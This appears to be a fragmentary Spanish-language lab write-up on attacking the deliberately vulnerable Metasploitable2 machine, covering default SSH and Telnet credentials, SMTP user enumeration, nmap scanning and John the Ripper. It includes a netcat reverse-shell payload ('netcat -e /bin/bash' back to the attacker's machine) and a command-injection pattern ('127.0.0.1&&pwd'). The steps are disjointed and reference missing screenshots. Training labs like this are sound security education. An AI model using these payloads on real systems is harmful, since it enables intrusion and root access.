Академический Документы
Профессиональный Документы
Культура Документы
Fingerprinting
PUERTO 22 SSH
En el puerto 22 está corriendo OpenSSH 4.7p1. Si pasamos un escáner de
vulnerabilidades como nessus u openvas, una de las vulnerabilidades nos indica
que este servicio tiene los credenciales por defecto, siendo estos la palabra
"user" tanto para el usuario como para la contraseña.
El siguiente paso es ver el PID del proceso que utiliza la tarjeta de red para
ejecutar nuestro exploit en el mismo proceso.
En este caso es el número 2701. Antes de ejecutar el exploit, vamos a crear un
payload que conecte mediante netcat con nuestra máquina Kali cuando
ejecutemos el exploit, obteniendo asi nuestra shell con privilegios root.
Creamos un archivo llamado "run" en la misma carpeta que el exploit con el
siguiente contenido:
#!/bin/bash
/bin/netcat -e /bin/bash 192.168.0.190 4444
PUERTO 23 TELNET
Este puerto no tiene misterio ninguno puesto que nada mas conectarnos, nos
aparece el siguiente mensaje.
Nos dice usuario y contraseña para el login, además el usuario msfadmin tiene
permisos root asique no hay nada mas que hacer.
PUERTO 25 SMTP
Esta vez vamos a utilizar un auxiliar de metasploit para obtener nombres de
usuario.
Command Execution
Nos aparece una pantalla en la que podemos hacer un ping a la IP indicada. Pero
además podemos ejecutar mas comandos con la siguiente sintaxis: IP&&COMANDO.
Ejemplo: 127.0.0.1&&pwd
En la captura vemos como responde al ping y al comando pwd. Ahora ya depende de
nuestra imaginación y los permisos que tengamos.
Actividad 3
Usare una vulnerabilidad para conseguir usuarios y contraseñas
Y usare una aplicación atacante llamada John The Ripper
4. Espere a que se inicialicen los servicios dura entre 2-4 minutos depende
su configuración
5. Abrimos el terminal en kali Linux y colocamos el comando nmap –sS –
sV 192.168.100.7 (en este caso la ip de metasploitable2 en mi red es de
192.168.100.7) esto nos mostrara los servicios vulnerables
6. Usaremos esta que es la vulnerabilidad que nos deja acceder al espacio de las
contraseñas